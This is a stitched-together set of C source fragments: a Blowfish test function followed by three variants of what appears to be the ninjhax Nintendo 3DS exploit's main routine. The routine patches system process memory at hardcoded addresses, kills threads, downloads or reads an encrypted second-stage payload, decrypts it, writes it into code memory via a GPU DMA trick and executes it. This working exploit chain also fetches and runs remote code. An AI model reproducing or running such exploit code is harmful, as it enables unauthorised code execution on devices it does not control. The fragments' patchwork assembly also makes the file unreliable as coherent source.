void test_beecrypt_blowfish_ecb() { blowfishParam encctx; blowfishSetup(&encctx, (byte*)enckey, 128, ENCRYPT); for(unsigned int p = 0; p < bufferlen; p += 8) blowfishEncrypt(&encctx, (uint32_t*)(buffer + p), (uint32_t*)(buffer + p)); blowfishParam decctx; blowfishSetup(&decctx, (byte*)enckey, 128, DECRYPT); for(unsigned int p = 0; p < bufferlen; p += 8) blowfishDecrypt(&decctx, (uint32_t*)(buffer + p), (uint32_t*)(buffer + p)); }
int _main() { Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR; Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR; paintScreen(0x00,0x00,0x00); // drawString((u8*)CN_TOPFBADR1,"ninjhaxx",0,0); // drawString((u8*)CN_TOPFBADR2,"ninjhaxx",0,0); Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR; int line=10; Result ret; Handle* addressArbiterHandle=(Handle*)0x003414B0; Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78; Handle** dspHandle=(Handle**)0x341A4C; _DSP_UnloadComponent(*dspHandle); //close threads //patch gsp event handler addr to kill gsp thread ASAP *((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr //patch waitSyncN patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41); patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45); patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A); // patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44); // patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31); //patch arbitrateAddress patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C); //wake threads svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0); svc_signalEvent(((Handle*)0x354ba8)[2]); s32 out; svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1); //CHECK ! //kill thread5 without panicking the kernel... *(u8*)(0x3664D8+0xd)=0x00; //load secondary payload u32 secondaryPayloadSize; { Result ret; Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR; FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}}; //read secondary payload file Handle fileHandle; ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE); if(ret)*(u32*)NULL=0xC0DF0002; ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14100000, 0x00011000); if(ret)*(u32*)NULL=0xC0DF0003; ret=_FSFILE_Close(fileHandle); if(ret)*(u32*)NULL=0xC0DF0004; } //decrypt it { Result (*blowfishKeyScheduler)(u32* dst)=(void*)0x001A5900; Result (*blowfishDecrypt)(u32* blowfishKeyData, u32* src, u32* dst, u32 size)=(void*)0x001A5F48; blowfishKeyScheduler((u32*)0x14200000); blowfishDecrypt((u32*)0x14200000, (u32*)0x14100000, (u32*)0x14100000, secondaryPayloadSize); } ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000); doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000A000); svc_sleepThread(0x3B9ACA00); void (*reset)(int size)=(void*)CN_3DSX_LOADADR; reset(0); while(1); return 0; }
int _main() { Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR; Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR; for(int i=0; i<0x46500*2;i++)((u8*)CN_TOPFBADR1)[i]=0x00; // drawString(TOPFBADR1,"ninjhaxx",0,0); // drawString(TOPFBADR2,"ninjhaxx",0,0); Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR; int line=10; Result ret; Handle* addressArbiterHandle=(Handle*)0x334960; Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002BA368; Handle** dspHandle=(Handle**)0x334EFC; _DSP_UnloadComponent(*dspHandle); //close threads //patch gsp event handler addr to kill gsp thread ASAP *((u32*)(0x356208+0x10+4*0x4))=0x002ABEDC; //svc 0x9 addr //patch waitSyncN patchMem(gspHandle, computeCodeAddress(0x00192200), 0x200, 0x19, 0x4F); patchMem(gspHandle, computeCodeAddress(0x00192600), 0x200, 0x7, 0x13); patchMem(gspHandle, computeCodeAddress(0x001CA200), 0x200, 0xB, 0x1E); // patchMem(gspHandle, computeCodeAddress(0x000C6100), 0x200, 0x3C, 0x52); //patch arbitrateAddress patchMem(gspHandle, computeCodeAddress(0x001C9E00), 0x200, 0x14, 0x40); //wake threads svc_arbitrateAddress(*addressArbiterHandle, 0x35811c, 0, -1, 0); svc_signalEvent(((Handle*)0x3480d0)[2]); s32 out; svc_releaseSemaphore(&out, *(Handle*)0x357490, 1); //kill thread5 without panicking the kernel... *(u8*)0x359935=0x00; svc_sleepThread(0x10000000); Handle httpcHandle; ret=_srv_getServiceHandle(srvHandle, &httpcHandle, "http:C"); // drawHex(ret,0,line+=10); // drawHex(httpcHandle,0,line+=10); Handle httpContextHandle=0x00; ret=HTTPC_Initialize(httpcHandle); // drawHex(ret,0,line+=10); ret=HTTPC_CreateContext(httpcHandle, CN_NINJHAX_URL FIRM_VERSION "_" CN_VERSION "_" SPIDER_VERSION "_" RO_VERSION ".bin", &httpContextHandle); // drawHex(ret,0,line+=10); Handle httpcHandle2; ret=_srv_getServiceHandle(srvHandle, &httpcHandle2, "http:C"); if(ret)*(u32*)NULL=0xC0DE0001; ret=HTTPC_InitializeConnectionSession(httpcHandle2, httpContextHandle); if(ret)*(u32*)NULL=0xC0DE0002; ret=HTTPC_SetProxyDefault(httpcHandle2, httpContextHandle); if(ret)*(u32*)NULL=0xC0DE0003; // drawHex(ret,0,line+=10); ret=HTTPC_BeginRequest(httpcHandle2, httpContextHandle); if(ret)*(u32*)NULL=0xC0DE0004; // drawHex(ret,0,line+=10); u8* buffer0=(u8*)0x14300000; u8* buffer1=(u8*)0x14100000; u32 secondaryPayloadSize=0x0; ret=HTTPC_ReceiveData(httpcHandle2, httpContextHandle, buffer0, 0x300000); if(ret)*(u32*)NULL=0xC0DE0005; ret=HTTPC_GetDownloadSizeState(httpcHandle2, httpContextHandle, &secondaryPayloadSize); if(ret)*(u32*)NULL=0xC0DE0006; // drawHex(ret,0,line+=10); HTTPC_CloseContext(httpcHandle2, httpContextHandle); if(ret)*(u32*)NULL=0xC0DE0007; //TODO : modify key/parray first ? //(use some of its slots as variables in ROP to confuse people ?) //decrypt secondary payload Result (*blowfishKeyScheduler)(u32* dst)=(void*)0x001A44BC; Result (*blowfishDecrypt)(u32* blowfishKeyData, u32* src, u32* dst, u32 size)=(void*)0x001A4B04; blowfishKeyScheduler((u32*)0x14200000); blowfishDecrypt((u32*)0x14200000, (u32*)buffer0, (u32*)buffer1, secondaryPayloadSize); ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)buffer1, 0x300000); // drawHex(ret,0,line+=10); doGspwn((u32*)(buffer1), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000A000); svc_sleepThread(0x3B9ACA00); // drawString(TOPFBADR1,"ninjhax2",100,0); // drawString(TOPFBADR2,"ninjhax2",100,0); // //close thread handles // ret=svc_closeHandle(*((Handle*)0x359938)); // ret=svc_closeHandle(*((Handle*)0x34FEA4)); // ret=svc_closeHandle(*((Handle*)0x356274)); // ret=svc_closeHandle(*((Handle*)0x334730)); // ret=svc_closeHandle(*((Handle*)0x334F64)); void (*reset)(u32 size)=(void*)CN_3DSX_LOADADR; reset(secondaryPayloadSize); return 0; }
int _main() { Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR; Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR; for(int i=0; i<0x46500*2;i++)((u8*)CN_TOPFBADR1)[i]=0x00; // drawString(TOPFBADR1,"ninjhaxx",0,0); // drawString(TOPFBADR2,"ninjhaxx",0,0); Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR; int line=10; Result ret; Handle* addressArbiterHandle=(Handle*)0x003414B0; Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78; Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002B8B24; Handle** dspHandle=(Handle**)0x341A4C; _DSP_UnloadComponent(*dspHandle); _DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2); //close threads //patch gsp event handler addr to kill gsp thread ASAP *((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr //patch waitSyncN patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41); patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45); patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A); // patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44); // patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31); //patch arbitrateAddress patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C); //wake threads svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0); svc_signalEvent(((Handle*)0x354ba8)[2]); s32 out; svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1); //CHECK ! //kill thread5 without panicking the kernel... *(u8*)(0x3664D8+0xd)=0x00; svc_sleepThread(0x10000000); Handle httpcHandle; ret=_srv_getServiceHandle(srvHandle, &httpcHandle, "http:C"); // drawHex(ret,0,line+=10); // drawHex(httpcHandle,0,line+=10); Handle httpContextHandle=0x00; ret=HTTPC_Initialize(httpcHandle); // drawHex(ret,0,line+=10); ret=HTTPC_CreateContext(httpcHandle, CN_NINJHAX_URL OUTNAME ".bin", &httpContextHandle); // drawHex(ret,0,line+=10); Handle httpcHandle2; ret=_srv_getServiceHandle(srvHandle, &httpcHandle2, "http:C"); ret=HTTPC_InitializeConnectionSession(httpcHandle2, httpContextHandle); ret=HTTPC_SetProxyDefault(httpcHandle2, httpContextHandle); // drawHex(ret,0,line+=10); ret=HTTPC_BeginRequest(httpcHandle2, httpContextHandle); // drawHex(ret,0,line+=10); u8* buffer0=(u8*)0x14100000; u8* buffer1=(u8*)0x14300000; u32 secondaryPayloadSize=0x0; ret=HTTPC_ReceiveData(httpcHandle2, httpContextHandle, buffer0, 0x300000); ret=HTTPC_GetDownloadSizeState(httpcHandle2, httpContextHandle, &secondaryPayloadSize); // drawHex(ret,0,line+=10); HTTPC_CloseContext(httpcHandle2, httpContextHandle); //TODO : modify key/parray first ? //(use some of its slots as variables in ROP to confuse people ?) //decrypt secondary payload Result (*blowfishKeyScheduler)(u32* dst)=(void*)0x001A5900; Result (*blowfishDecrypt)(u32* blowfishKeyData, u32* src, u32* dst, u32 size)=(void*)0x001A5F48; blowfishKeyScheduler((u32*)0x14200000); blowfishDecrypt((u32*)0x14200000, (u32*)buffer0, (u32*)buffer1, secondaryPayloadSize); while(!*(u32*)(&buffer1[secondaryPayloadSize-4]))secondaryPayloadSize-=4; lzss_decompress(buffer1, secondaryPayloadSize, buffer0, lzss_get_decompressed_size(buffer1, secondaryPayloadSize)); ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)buffer0, 0x300000); // drawHex(ret,0,line+=10); doGspwn((u32*)(buffer0), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000C000); svc_sleepThread(0x3B9ACA00); // drawString(TOPFBADR1,"ninjhax2",100,0); // drawString(TOPFBADR2,"ninjhax2",100,0); void (*reset)(u32 size)=(void*)CN_3DSX_LOADADR; reset(secondaryPayloadSize); return 0; }